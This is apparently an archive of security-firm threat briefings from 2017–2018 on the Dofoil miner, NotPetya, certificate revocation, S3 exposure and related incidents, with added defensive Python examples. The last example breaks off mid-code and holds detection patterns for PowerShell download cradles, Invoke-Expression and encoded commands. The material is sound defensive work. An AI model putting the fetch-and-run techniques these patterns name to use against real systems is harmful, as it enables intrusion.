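        """Triple-redundancy check: any disagreeing channel forces the safe state."""
        if channels_agree(readings, tolerance):
            return NORMAL
        self.alerts.append("%s: channel disagreement %s" % (self.name, list(readings)))
        return SAFE_STATE

    def update_firmware(self, new_version: str) -> bool:
        """Writes are accepted only while the physical key is in PROGRAM."""
        if self.key_position != "PROGRAM":
            self.alerts.append("%s: rejected firmware write %s, key in %s"
                               % (self.name, new_version, self.key_position))
            return False
        self.firmware = new_version
        return True


def controllers_left_writable(controllers):
    """The operational check this incident argues for: which controllers were
    left in read-write mode after maintenance?"""
    return [c.name for c in controllers if c.key_position == "PROGRAM"]


if __name__ == "__main__":
    fleet = [SafetyController("SIS-01"), SafetyController("SIS-02", key_position="PROGRAM")]
    print(fleet[0].evaluate([100.0, 100.2, 100.1]))    # NORMAL
    print(fleet[0].evaluate([100.0, 100.2, 87.0]))     # SAFE_SHUTDOWN
    print(fleet[0].update_firmware("1.1"))              # False: key in RUN
    print(controllers_left_writable(fleet))             # ['SIS-02']
```

The model shows why the design is sound only while the key is honoured: a compromised engineering workstation cannot write firmware to SIS-01, but SIS-02, left in PROGRAM, accepts the write with no further check. A periodic report of controllers in PROGRAM is a cheap control that would have surfaced the condition described above.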

Remote network access to systems enabled hackers to destroy hard drives inside the company’s computers, wiping their data clean (NYT). It also appears that only an error in the attack code prevented physical damage and possibly explosions.


InGuardians’ clients may be at LOW risk for the specific attacks used against these Industrial Control Systems (ICS).

However, the broader issue of increased risk from “work arounds” which inevitably occur in every business may be negating what you think is in place for risk mitigation. The focus is NOT on malicious employees, but on those trying to succeed in the face of unintended policy conflicts. Too few people required to do detailed checks on too many systems too widely separated or remotely located is only one of the sorts of situations that creep into daily ops.


Review ACTUAL operating conditions and procedures compared to policy. Third party audits or interdepartmental audit teams provide fresh perspectives.

Think more like an attacker. Be less sure – “my door is locked, I can relax” – and more – “the door has a lock but how would it get picked? Broken? Simply evaded?  If it was picked, how would I know”.  Red Teams don’t simply do set penetration tests, but use creative thinking to find the unexpected gaps, the new approaches. Those attacking your systems don’t have any rules.

Additional Resources




03/12/2018 Dofoil trojan variant used to install cryptocurrency-mining malware
Microsoft’s Windows Defender Research group identified a new variant of the Win32/Dofoil remote access trojan which installed a cryptocurrency miner for Electroneum (ETN) coin.


The impact of this trend is severe, due in part to the trojan’s ability to download and execute code on command.  The Dofoil family of trojans give the attackers full command and control of the compromised system. In addition to crypto mining, the trojan has previously been used to install ransomware and other malicious code.

In this latest attack, Dofoil used a technique known as process hollowing, copying legitimate binaries for explorer.exe and swapping malware in its place.

Many attackers are using cryptocurrency mining as a major revenue stream.  During the WannaCry outbreak, at least two other groups used the same exploits to install crypto miners and subsequently earn millions of dollars (far better than the WannaCry authors fared.)


InGuardians recommends having a robust segmented network, with good instrumentation of inbound and outbound traffic.  Organizations can use network and host monitoring tools that identify unusual behavior and activity to help identify and contain malware outbreaks.  Some of the tools that can be used for detection and containment are Bro, Snort, and Windows Defender. Many anti-malware and threat protection services claim to detect and protect against cryptocurrency miners.

Detection of cryptocurrency miners is typically done by identifying the installation, code injection, or persistence mechanisms, as well as the coin mining itself.  While the miners that we are discussing here are hidden in running processes, there are many implementations of JavaScript miners that run in browsers.
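
Network instrumentation catches pool-based miners because they speak a recognisable protocol, Stratum (JSON-RPC with `mining.*` methods), in cleartext. The following is an added example, not part of the original briefing and not a Bro or Snort rule: detection logic run over a handful of constructed traffic-log lines in a simple constructed format, flagging Stratum method names with high confidence and connections to commonly used pool ports with low confidence. The log format, port list and sample lines are this example's own.

```python
import json
import re
from collections import Counter

# Stratum is the JSON-RPC protocol that pool-based miners speak; these method
# names appear in cleartext on the wire.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "mining.notify", "mining.set_difficulty"}
# Ports often used by mining pools; a weak heuristic on its own (constructed list).
POOL_PORTS = {3333, 4444, 5555, 7777}

# Constructed log format: "<ts> <src>:<port> -> <dst>:<port> <payload>"
LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (.*)$")


def classify_payload(dst_port, payload):
    """Return (reason, confidence) or None for benign-looking traffic."""
    try:
        msg = json.loads(payload)
    except ValueError:
        msg = None
    if isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS:
        return ("stratum method %s" % msg["method"], "high")
    if "stratum+tcp://" in payload:
        return ("stratum pool URL in payload", "high")
    if dst_port in POOL_PORTS:
        return ("connection to common pool port %d" % dst_port, "low")
    return None


def detect_miners(lines):
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, _sport, dst, dport, payload = m.groups()
        hit = classify_payload(int(dport), payload)
        if hit:
            findings.append({"ts": ts, "src": src, "dst": "%s:%s" % (dst, dport),
                             "reason": hit[0], "confidence": hit[1]})
    return findings


def hosts_by_hits(findings):
    """Which internal hosts to isolate first."""
    return Counter(f["src"] for f in findings).most_common()


# Constructed sample traffic log (not real captures).
SAMPLE_LOG = [
    '2018-03-07T10:21:05Z 10.0.0.15:51234 -> 203.0.113.9:3333 {"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}',
    '2018-03-07T10:21:06Z 10.0.0.15:51234 -> 203.0.113.9:3333 {"id":2,"method":"mining.authorize","params":["wallet.worker","x"]}',
    '2018-03-07T10:21:09Z 10.0.0.22:44120 -> 198.51.100.7:443 GET /index.html HTTP/1.1',
    '2018-03-07T10:22:41Z 10.0.0.31:50001 -> 203.0.113.40:4444 <binary>',
]

if __name__ == "__main__":
    hits = detect_miners(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(hosts_by_hits(hits))
```

The low-confidence port rule exists to surface miners that wrap Stratum in TLS, where the method names are no longer visible; on its own it will false-positive, so it is best used to prioritise hosts for the host-based checks (process hollowing, persistence) the briefing mentions.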

In addition to segmentation and instrumentation, InGuardians recommends having solid backup and recovery solutions in place.  These should be tested on a regular basis, with verification of the recovered systems.

Additional Resources

Win32/Dofoil (Microsoft Windows Defender Security Intelligence)

DoFoil: Crypto-mining Malware Outbreak Infects 500,000 Computers In One Day (Newsweek)

The State of Malicious Crypto-mining (MalwareBytesBlog)

03/05/2018 Widespread SSL Certificate Revocation Disrupting Internet Transport Encryption with Further Disruption Planned for April and October

On Wednesday, Trustico (a Symantec reseller) triggered the revocation of roughly 23,000 SSL/TLS certificates, in advance of April and October’s certificate disruptions on any certificate sold under the brands Symantec, GeoTrust, Thawte, and RapidSSL.

While the April deadline for Symantec, GeoTrust, Thawte and RapidSSL certificates looms, Trustico’s method of revocation has caused further concern. Trustico wanted to move its customers from roughly 50,000 Symantec-provided certificates to new ones provided by Comodo. Digicert, who had purchased Symantec’s certificate business, initially refused, on the basis that it would only revoke so many certificates in the case of a security breach. Trustico’s CEO then e-mailed 23,000 certificates’ private keys without encryption to Digicert, thus creating a breach. The breach was compounded when a remote code execution vulnerability was found in Trustico’s website.

This situation calls into question Trustico’s practices as a certificate reseller. First, certificate vendors should not retain private keys. Second, Trustico’s choice to e-mail private keys put all communications using those keys at risk and may have failed to give customers the opportunity to replace the certificates before this risk window.

Any organization using one of the revoked Trustico-resold Symantec SSL certificates has lost the integrity of HTTPS connections to any server using that certificate. Users will generally see an untrusted connection error immediately and many will understand that a problem exists. Further, any organization using a Symantec certificate, including those branded as GeoTrust, Thawte and RapidSSL, will face a similar problem on April 17th or in October, at which point Google’s Chrome and Mozilla’s Firefox browsers will begin stating that the certificates are untrusted. See the schedule below (under “Recommendations”) for more detail.

InGuardians strongly recommends that organizations audit their SSL/TLS certificates, determining which have been provided by Symantec, GeoTrust, Thawte and RapidSSL. Staff should replace every certificate provided by these companies well before the following deadlines:

April 17th: Certificates issued before June 1, 2016 will not work with Chrome 66.

May: Certificates issued before June 1, 2016 will not work with Firefox 60.

October: Certificates will no longer be trusted, as of Firefox 63.

October 23rd: Certificates will no longer be trusted, as of Chrome 70.

Organizations can use a number of tools to check their SSL/TLS certificates, whether for their web servers or their other SSL/TLS-enabled services. The popular open source tool, nmap, will display information about the certificate enabled on one or more ports, like so:

nmap -v -sT -p 443 --script=ssl-cert <target> | egrep '(Issuer|valid)'
| Issuer: commonName=GeoTrust RSA CA 2018/organizationName=DigiCert Inc/countryName=US/
| Not valid before: 2018-01-25T00:00:00
| Not valid after:  2019-02-24T12:00:00
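
Across more than a few hosts, the nmap output above is easier to act on when parsed and matched against the deadline schedule. The following is an added example, not part of the original briefing: it reads `--script=ssl-cert` output for several hosts and ports, matches issuers against the Symantec, GeoTrust, Thawte and RapidSSL brand names, and assigns each certificate to the April or October deadline based on the June 1, 2016 issuance cutoff. The sample output is constructed; the "review-chain" outcome for a brand name appearing on a DigiCert-operated issuer (as in the sample above) is this example's assumption and should be confirmed against the certificate chain.

```python
import re
from datetime import datetime

LEGACY_BRANDS = ("symantec", "geotrust", "thawte", "rapidssl")
CUTOFF = datetime(2016, 6, 1)   # issuance date that decides April vs. October

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp")
ISSUER_RE = re.compile(r"Issuer: (.*)$")
VALID_RE = re.compile(r"Not valid (before|after):\s+(\S+)")


def parse_nmap_ssl_cert(text):
    """Turn `nmap --script=ssl-cert` output into one record per host/port."""
    certs, host = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            certs.append({"host": host, "port": int(m.group(1)), "issuer": {}})
            continue
        if not certs:
            continue
        m = ISSUER_RE.search(line)
        if m:
            for pair in m.group(1).split("/"):
                if "=" in pair:
                    k, v = pair.split("=", 1)
                    certs[-1]["issuer"][k] = v
            continue
        m = VALID_RE.search(line)
        if m:
            certs[-1]["not_" + m.group(1)] = datetime.strptime(m.group(2), "%Y-%m-%dT%H:%M:%S")
    return certs


def classify(cert):
    cn = cert["issuer"].get("commonName", "").lower()
    org = cert["issuer"].get("organizationName", "").lower()
    if not any(b in cn or b in org for b in LEGACY_BRANDS):
        return "unaffected"
    if "digicert" in org:
        # Brand name reused by a DigiCert-operated CA (as in the sample output
        # above).  Assumption for this example: such chains are not on the
        # distrust list, but the chain should be confirmed rather than assumed.
        return "review-chain"
    if cert["not_before"] < CUTOFF:
        return "replace before 2018-04-17 (Chrome 66) / May (Firefox 60)"
    return "replace before October 2018 (Firefox 63, Chrome 70)"


def report(text):
    return [(c["host"], c["port"], classify(c)) for c in parse_nmap_ssl_cert(text)]


# Constructed sample output covering each outcome; not a real scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for www.example.com (192.0.2.10)
PORT     STATE SERVICE
443/tcp  open  https
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=GeoTrust SSL CA - G3/organizationName=GeoTrust Inc./countryName=US/
| Not valid before: 2015-09-01T00:00:00
|_Not valid after:  2018-09-01T23:59:59
8443/tcp open  https-alt
| ssl-cert: Subject: commonName=api.example.com
| Issuer: commonName=RapidSSL SHA256 CA/organizationName=GeoTrust Inc./countryName=US/
| Not valid before: 2017-03-10T00:00:00
|_Not valid after:  2019-03-10T23:59:59
Nmap scan report for mail.example.com (192.0.2.11)
PORT    STATE SERVICE
443/tcp open  https
| ssl-cert: Subject: commonName=mail.example.com
| Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US/
| Not valid before: 2018-02-20T09:00:00
|_Not valid after:  2018-05-21T09:00:00
993/tcp open  imaps
| ssl-cert: Subject: commonName=mail.example.com
| Issuer: commonName=GeoTrust RSA CA 2018/organizationName=DigiCert Inc/countryName=US/
| Not valid before: 2018-01-25T00:00:00
|_Not valid after:  2019-02-24T12:00:00
"""

if __name__ == "__main__":
    for row in report(SAMPLE_NMAP_OUTPUT):
        print("%s:%d  %s" % row)
```

Run nmap with `-p-` (or at least the full list of ports your services use) rather than `-p 443` when producing the input, since the classifier can only grade certificates that appear in the output.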

Organizations should be careful to check all ports on a system, and not just the standard service ports for SSL/TLS.

Additional Resources
Google: “Chrome’s Plan to Distrust Symantec Certificates”

Mozilla: “CA:Symantec Issues”

DigiCert: “How do you handle mass revocation requests?”

Trustico® Abandons Symantec® SSL Certificates

02/26/2018 Increased attacker focus on exposed cloud services, specifically AWS Simple Storage Service (S3) Buckets

Amazon’s cloud-based Simple Storage Service Buckets, colloquially referred to as “S3 Buckets”, have been a recent focus of attackers and security researchers.  With the advent of new open source and publicly-available tools to search for improperly configured S3 buckets, bad actors and information security firms have found many cases where the buckets’ owners have inadvertently granted access to every user on the Internet.
Internet-accessible S3 buckets have multiple risks. In cases of world-wide read-only access, the discoverers have found personally-identifiable information (PII) and other sensitive data. In at least one case of world-wide write access, the discoverer found a production website hosting content directly from the bucket, such that any Internet user could alter the website’s content.  A bad actor could drastically change the overall presentation of the site and would likely add hostile JavaScript code that would run in every visitor’s browser, including key-loggers or crypto-coin mining clients. When discovered, this could ultimately reduce customer faith in the company owning the S3-backed site.
In moving to cloud-hosted services, many organizations have failed to heed widespread warnings with this message:
Organizations must secure and monitor cloud-based services just as strongly as with traditional on-premise infrastructure.


Impact from exposure of Amazon S3 is varied, depending on an organization’s adoption and configuration of Amazon’s cloud-based storage infrastructure:

Known adoption of Amazon S3: The risk level varies from low to critical, depending on individual bucket configuration for read/write access, granularity of defined accesses, types of content stored, and use cases for the stored content. The overall level of risk would be determined by these factors and will be different for each individual bucket within an organization’s cloud infrastructure.

No known adoption of Amazon S3: The current risk is undefined and merits analysis to identify whether your organization is using S3; if it is, see above.


InGuardians recommends performing a self-assessment of existing S3 Buckets using currently available tools, such as AWSBucketDump and BuckHacker.  Results of these tools should then undergo a thorough inventory and risk analysis.

In addition to these open source tools, Amazon makes the AWS Trusted Advisor tool available to customers with a Business or Enterprise-level support plan. Trusted Advisor can analyze an AWS environment, including its S3 buckets, and make best practice recommendations.
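
The per-bucket risk analysis described above comes down to two questions: does the bucket's ACL grant anything to the Internet-wide groups, and does its bucket policy allow anonymous principals? The following is an added example, not part of the original briefing and not AWSBucketDump or BuckHacker: it inspects ACLs in the structure S3's GetBucketAcl returns and policy documents in the standard IAM policy format, using the real AllUsers and AuthenticatedUsers group URIs. The severity mapping, bucket names and ACL contents are constructed for this example.

```python
# Group URIs are the real S3 ACL grantee identifiers for "everyone" and
# "anyone with an AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "everyone on the Internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account holder",
}
# Severity mapping is this example's judgement: write access to a bucket that
# backs a website lets anyone change the site; read access exposes stored data.
SEVERITY = {"FULL_CONTROL": "critical", "WRITE": "critical", "WRITE_ACP": "critical",
            "READ": "high", "READ_ACP": "medium"}
RANK = {"ok": 0, "medium": 1, "high": 2, "critical": 3}


def public_acl_grants(acl):
    """acl has the shape returned by S3 GetBucketAcl: {"Owner": {...}, "Grants": [...]}."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS:
            perm = grant["Permission"]
            findings.append({"audience": PUBLIC_GROUPS[uri], "permission": perm,
                             "severity": SEVERITY.get(perm, "medium")})
    return findings


def public_policy_statements(policy):
    """Bucket policies can open a bucket too: an Allow with Principal "*" and
    no Condition applies to anonymous requests.  Returns the allowed actions."""
    hits = []
    for stmt in policy.get("Statement", []):
        principal = stmt.get("Principal")
        anonymous = principal == "*" or (isinstance(principal, dict) and principal.get("AWS") == "*")
        if stmt.get("Effect") == "Allow" and anonymous and not stmt.get("Condition"):
            hits.append(stmt.get("Action"))
    return hits


def assess_buckets(acls):
    """acls: {bucket_name: acl}; returns the worst public exposure per bucket."""
    result = {}
    for name, acl in acls.items():
        worst = "ok"
        for finding in public_acl_grants(acl):
            if RANK[finding["severity"]] > RANK[worst]:
                worst = finding["severity"]
        result[name] = worst
    return result


def _group(uri, permission):
    return {"Grantee": {"Type": "Group", "URI": uri}, "Permission": permission}


OWNER = {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}, "Permission": "FULL_CONTROL"}

# Constructed ACLs and policy, not real account data.
SAMPLE_ACLS = {
    "corp-backups": {"Grants": [OWNER, _group("http://acs.amazonaws.com/groups/global/AllUsers", "READ")]},
    "www-assets": {"Grants": [OWNER,
                              _group("http://acs.amazonaws.com/groups/global/AllUsers", "READ"),
                              _group("http://acs.amazonaws.com/groups/global/AllUsers", "WRITE")]},
    "private-logs": {"Grants": [OWNER]},
}

SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::www-assets/*"},
]}

if __name__ == "__main__":
    print(assess_buckets(SAMPLE_ACLS))
    print(public_policy_statements(SAMPLE_POLICY))
```

In a real run the ACL and policy documents come from the S3 API for every bucket in every account the organization owns; the inventory step is what most often fails, so enumerate accounts first and buckets second, then grade each bucket with logic like the above.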

Additional Resources

Tesla Cryptojacked by Currency Miners

AWSBucketDump, an Open Source S3 Bucket Search Tool

BuckHacker, an S3 Search Engine

AWS S3 Documentation: Which Access Control Method Should I Use?

AWS Trusted Advisor

02/20/2018 Theft of Newtek domains is a reminder to stay vigilant

Last week a web services company (Newtek) responsible for hosting over 100,000 e-commerce based websites and email servers had three of its core domains stolen.  These domains originally hosted software that allowed customers of these services to manage their websites.

The attackers then replaced the application that users would normally use to manage their websites with their own application in the form of a live-chat service.  When users logged in, they believed themselves to be chatting with a helpful admin, when in fact they were communicating with the attacker.


The full impact of this is still being determined.  However, corporate email for many of their customers became unavailable, business websites no longer resolved, and sensitive information was most likely communicated to the attacker.


InGuardians recommends that all businesses consider domain hijacking as a potential event in their Business Continuity Plans (BCP).  It’s important to stay vigilant in ensuring continued ownership of domains. It’s also important to have plans to use secondary domains for web and email traffic in the event of having lost ownership of a domain.

InGuardians recommends building your own capabilities to gather counter-intelligence and to proactively monitor your organization's digital footprint.  Consider scripts or services for monitoring DNS changes to the domains that you control.


Wikipedia lists these options as a means to prevent an unwanted domain transfer:

  • Use strong email passwords and enable two-factor authentication if available.
  • Disable POP if your email provider is able to use a different protocol.
  • Tick the setting “always use https” under email options.
  • Make sure to renew your domain registration in a timely manner – with timely payments and register them for at least five (5) years.
  • Use a domain-name registrar that offers enhanced transfer protection, i.e., “domain locking” and even consider paying for registry locking.

Additional Resources

02/12/2018 Smart devices add exposure and threat during a breach and are a source of intelligence and forensic data during incident response.
A common challenge in any incident response is figuring out how access was gained, which vulnerability or exploits were used, and how to prevent recurrence. Many breaches are not single events, but the end of a longer series of probes, penetrations, and exfiltrations. The reality is that we are often dealing not with “a breach,” but a series of incidents that may have been going on longer than many realize.

The explosion of smart devices creates many more opportunities not only to reveal information but also to serve as attack vectors. A “phishing” email might be read on an employee’s cell phone and not directly breach a corporate system. But it might install malware on that phone, so the next time the phone is within WiFi or Bluetooth range of a business network the malware starts searching for new opportunities. This shifts what would have been an external penetration to an internal one.

The specific impact to InGuardians customers is relatively low.

The real challenge is in mapping the many additional connections to your networks, and identifying where such connections are logged – if at all. You cannot effectively investigate the cause or source of a breach if you do not have a clear record of the network.

InGuardians recommends regular review of network architecture as it develops, not merely as planned. Systems and connections often grow organically and in creeping increments, and too often expedient solutions are imperfectly documented. It is important to know what the network looks like today, to know where device access logs are stored, and whether they have ever been reviewed.  InGuardians highly recommends robust egress filtering and monitoring.

InGuardians also recommends reviewing the policy for the devices managed by your organization.  Secretary of Defense Mattis is reconsidering DoD’s policies for every personal electronic device that “transmits a two-way signal”.  That’s much more than just cell phones, but you should at least know WHAT you allow.

Additional Resources

02/05/2018 Strava heatmap exposes sensitive military bases, invoking the law of unintended consequences.
Something as innocuous as a running application paired with cloud access and GPS location data allowed users to identify sensitive military and government bases and users.  The Guardian newspaper used a script to generate GPS data to upload to a Strava account.  Following this, they used the application to find other users that also do the same run.  The runs matched sensitive locations such as military installations and classified government facilities.  They identified 50 users by name.

With so many interconnected devices, where is the boundary of your data?  If you don’t know where your data is and where it goes, you cannot secure it.  With multiple devices providing cloud or syncing functionality, the ease with which data can unintentionally leak out of the environment is astounding.

Impact from the Strava heatmap to InGuardians customers is relatively low.  The issue does present us with the conundrum of securing our data, performing operational security, and still being able to use that data and the many applications that have become intrinsic to our businesses.   

InGuardians’ primary recommendation is to analyze the potential exfiltration threats that applications pose, and to create policy to deal with these accordingly.  Some examples of applications and policies in this arena would be: a social media use policy, rules for onsite photography or mobile phone use, or modifying metadata.

InGuardians also recommends implementing a Mobile Device Management (MDM) solution to enforce policy onto the devices managed by your organization.  Locking down functionality on these devices according to your internal processes and policies is critical.  Unknown, unmanaged devices should not be allowed on your network.  The larger concern goes beyond “Strava” and may include data that is gathered but not publicly mapped.

Additional Resources

Strava Heatmap and related articles


07/25/2017 Mac malware (FruitFly) that was detected and patched in January is still making the rounds, according to a BlackHat presenter.

In January, malware that infects Mac OS X was detected impacting organizations performing research in the biomedical field.  This malware leveraged old functions that have been around in OS X for many years.  The main goal of the malware appears to be surveillance, given that it captures screenshots, accesses the webcam, and reportedly performs keylogging.

Apple released a patch for this issue in January when the malware was first detected.  Many news outlets are incorrectly reporting that there is no known way to detect this malware.  However, almost all major AV companies have signatures to detect FruitFly.

According to the BlackHat presenter, the recent infections appear to be mostly home users.  This is likely due to the fact that all properly licensed versions of OS X have been patched by Apple through a behind-the-scenes update mechanism, as of January.

The impact of this particular issue is low at the moment.

Even with a low impact, the detection of this malware is a reminder to practice good opsec (operational security) and keep built-in webcams covered unless in use.  Also, it is a reminder that even Apple systems can be vulnerable to malware.

InGuardians recommends that organizations ensure that all operating systems are licensed and up-to-date with all relevant security patches.  InGuardians also recommends that organizations use endpoint security products to properly monitor all operating systems, including Apple products.

Additional Resources

07/17/2017 Kaspersky anti-virus removed from two GSA Schedules
Kaspersky Anti-Virus (AV) has been removed from two GSA (Government Services Administration) schedules, due to concerns that the Kremlin may use Kaspersky products to compromise US Government computers.

A commonly used anti-virus product has been banned for purchase by any U.S. Government agencies which use GSA schedules 67 and 70.  While the US government has not yet banned Kaspersky products already purchased, or those purchased outside the GSA schedule, the Senate version of the 2018 defense bill places a blanket ban on Kaspersky products.  This bill has not yet been passed.  Many government and private organizations receiving funding from the U.S. or state governments are required to make such purchases via the GSA schedule.


This ban limits further acquisition of Kaspersky AV by those organizations required to follow GSA.  However, many organizations may already have this product entrenched within their infrastructure.  Still, organizations which are not required to adhere to the GSA schedule may decide to follow suit with the GSA’s ban on Kaspersky AV.  Organizations may have many questions on how to move forward.


Hold tight.  There is a significant amount of posturing and saber rattling on the geopolitical stage at the moment.  A number of independent research organizations are currently examining Kaspersky’s software, and reports should be forthcoming.

InGuardians recommends that organizations not rely solely on one vendor’s solutions for security products.  Organizations should evaluate multiple providers and select only those with which they can form a trusted relationship. In the event that a trusted relationship becomes compromised, organizations should have contingency plans that enable the removal of that vendor and the selection of a new one without losing coverage.  Most of our clients favor endpoint protection, in addition to layered application and network defenses, over traditional anti-virus.

Additional Resources

07/10/2017 DHS & FBI warn of attacks against US energy & manufacturing companies and employees

DHS and the FBI released a TLP:AMBER report warning US energy sector and manufacturing companies about ongoing cyber operations.  These operations include sophisticated physical and cyber attacks, as well as activities targeting employees and operators with the aim of infiltrating air-gapped networks.

Our customers in the energy sector have seen scanning and attacks increase in the last month, but one interesting twist in the report is the targeting of individual employees in order to infiltrate secure networks.  Many details regarding the attacks are now known to the public, in part because an irresponsible organization shared a TLP:AMBER report with the press.  The approach of going after operators and employees to target secure networks is reminiscent of how GCHQ hacked into Belgacom’s NOC.

This warning comes almost one month after Robert Lee and his team at Dragos released their research on the CRASHOVERRIDE malware, along with ESET’s analysis of Industroyer. Keep in mind that Robert Lee will be presenting details on CRASHOVERRIDE at Black Hat in just a few weeks.

Your key operations and security staff should be trained in operational security (opsec). Include physical security tests and targeting specific roles and personnel as part of your routine security assessments.

Additional Resources

News regarding recent hacking of nuclear plant:

Historical piece on GCHQ targeting Belgacom employees:

07/03/2017 Wiperware disguised as ransomware strikes globally, taking advantage of unpatched systems and flat networks.
The recent wave of supposed ransomware attacks, NotPetya, spread rapidly due to non-segmented (“flat”) networks after its initial infection. It is reported to have first hit Ukraine and subsequently spread internationally. Many of the targets that reported infection are industrial, financial, health or other components of critical infrastructure.

Whereas the Petya ransomware that first emerged last year was actual ransomware, the variant that wormed its way through non-segmented (“flat”) networks in June 2017 (NotPetya) does not allow for decryption of the data.  As such, InGuardians classifies this as wiperware.

NotPetya uses many different vectors to infect and perform subsequent infections.  Even though it does use the NSA exploits EternalBlue and EternalRomance that were addressed by Microsoft security update MS17-010, NotPetya also leverages many other vectors of attack.  It includes mimikatz, with that tool’s LSADump module.  This is used for recovering passwords with the aim of gaining administrative access locally and eventually at the domain level. NotPetya also uses PSExec as a means of subsequent infection, as well as WMI calls.

Many people responsible for network security claim that they thought they were patched against the NSA exploits. It’s key to note that NotPetya has multiple initial infection vectors, including phishing. Even if one of the NSA exploits became the vector of initial infection on an unpatched machine, the other vectors of subsequent infection allow it to spread unhindered through flat networks, full of otherwise patched systems.

Infections of NotPetya spread rapidly across non-segmented, or “flat,” networks, stealing credentials and leveraging privileges and trust.  The technical result is mangled data on infected systems.  This data is unrecoverable.  The business impact has been a shutdown of operations in many of the impacted targets.

The one common issue that allows the spread of NotPetya is networks that are not segmented with access control.  Logically segmented networks are still considered flat networks, as they lack access controls.  When access controls restrict traffic from traversing network segments, hosts are well isolated and this stymies infections of this type, containing them to a single host or portion of the network.

InGuardians recommends implementing restrictive access controls at the network level and isolating hosts using host-based firewalls or Private VLANs. InGuardians also recommends using Group Policies within Microsoft Active Directory to lock down endpoints and implement the Principle of Least Privilege, preventing the lateral spread from affected, internal systems.  These tactics are highly recommended to defend against modern malware attacks like NotPetya.

Additional Resources
Setting up Private VLANs

Implementing the Principle of Least Privilege within Various Versions of Windows

06/26/2017 Three Drupal updates patch critical vulnerabilities

One of the three critical vulnerabilities patched last week in the Drupal web content management system allows for remote code execution.

Drupal is one of the most popular content management systems in use, and the vulnerability described in CVE-2017-6920 gives an attacker the same capabilities on the system as Drupal itself.

This vulnerability is in the PECL YAML parser, and is related to a bug found recently in PHP.  PHP updated their documentation alerting developers to not pass unsanitized user input to these functions, which did not “fix” the vulnerability.

Drupal updated their code, changing the way they pass input to the affected functions, and is no longer vulnerable to this attack vector.

YAML parsing vulnerabilities have led to quick widespread exploitation in the past, in multiple web frameworks and languages, and are thus considered quite dangerous.

Recent high-profile website hacks and defacements emphasize the need to check your content management system implementation and ensure it is up to date.

  • Tactical recommendation: If your organization has deployed Drupal, update to Drupal 8.3.4 or Drupal 7.56, as both branches include the fixes for these vulnerabilities.
  • Strategic recommendation: Consider using a static publishing script to separate your editing/publishing platform from your delivery system. This allows your team to reap the benefits of a content management system, and couples it with the security of a static site. WordPress, Drupal and other popular systems have static publishing plugins or scripts.
Additional Resources
Drupal update:
CVE Entries for the three Drupal vulnerabilities:
Example static publishing plugins:
06/19/2017 Nation states in the ransomware business

Nation states are now confirmed to be using ransomware campaigns to fund state coffers.  The British National Cyber Security Centre (NCSC) reported this week that the WannaCry ransomware attack was launched from North Korea.  This follows the United States National Security Agency (NSA) assessment with the same conclusion.  Security experts believe that the attack was launched by the Lazarus Group tied to the government in Pyongyang.

This revelation further emphasizes the need for full backup, recovery and continuity plans to be tested and refreshed.  While most of our customers have robust patching, backup and recovery processes in place, we see from news reports the impact WannaCry had on critical production networks.  Many organizations have lost their data, or access to critical systems while being locked out during a ransomware attack; e.g., British National Health Service systems were crippled during the WannaCry attack.

InGuardians recommends reviewing, testing and validating your patching, and backup/recovery processes.  Incident response capabilities should be tested as well, guided by an internal Red Team exercise designed to emulate the ransomware attack threat model.  InGuardians does not recommend paying for the return of your data.  See link below for new regulations that might impact the practice of paying your way out of ransomware.

Additional Resources

Articles related to this issue:

NIST Incident Response:

Bitcoin regulations to prevent infosec companies from helping organizations pay ransom:

06/12/2017 PowerShell scripts execute in PowerPoint without macros

Microsoft’s powerful native scripting language, PowerShell, is able to execute inside a PowerPoint presentation without using macros.  This presents an issue for the many organizations that rely on blocking macros, or documents with macros, to minimize the risk of compromise via Microsoft Office documents.


InGuardians Red Team operators used this very technique to compromise one of our toughest clients just last week.  This is a very real threat posing risk to the information security of your organization.  Determine which controls and audit measures best fit your security posture and move swiftly to lock down this threat vector.


InGuardians recommends first determining if systems need PowerShell.  If needed, ensure PowerShell is up to date.  Older versions of PowerShell lack many of the security features that version 5 has. Take the necessary steps (outlined here: ) to detect PowerShell being used offensively on your systems.
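As an added example of the detection step recommended above (not InGuardians’ code and not the linked write-up), this scores the script text that PowerShell 5 records when script block logging is enabled (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) against a few indicators of offensive use, and also decodes and scores anything hidden behind an -EncodedCommand argument. The event field names and the three sample entries are constructed.

```python
"""Triage of PowerShell script block log text for signs of offensive use.

Added example, not part of the original briefing. PowerShell 5 can record every
script block it runs (Event ID 4104, Microsoft-Windows-PowerShell/Operational log,
once the "Turn on PowerShell Script Block Logging" policy is enabled). The entries
below are constructed samples of that text; the field names are assumptions.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Base64 payload following -e / -enc / -EncodedCommand.
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Indicators common to attacker tooling. Each also appears in legitimate
# administration, so entries are scored rather than flagged on a single hit.
INDICATORS = {
    "encoded_command": ENC_ARG,
    "download_cradle": re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Net\.WebClient)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
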